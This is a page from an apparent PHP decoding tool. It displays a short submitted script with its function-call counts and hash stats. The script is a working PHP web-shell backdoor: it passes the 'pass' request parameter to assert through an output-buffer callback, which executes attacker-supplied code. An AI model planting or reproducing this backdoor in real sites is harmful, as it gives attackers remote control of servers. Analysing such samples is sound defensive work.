Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php ob_start('assert'); echo $_REQUEST['pass']; ob_end_flush(); ?>..
Decoded Output download
None
Did this file decode correctly?
Original Code
<?php
ob_start('assert');
echo $_REQUEST['pass'];
ob_end_flush();
?>
Function Calls
ob_start | 1 |
ob_end_flush | 1 |
Stats
MD5 | 73fdf40334aa60dcd72b6025d710e7b3 |
Eval Count | 0 |
Decode Time | 98 ms |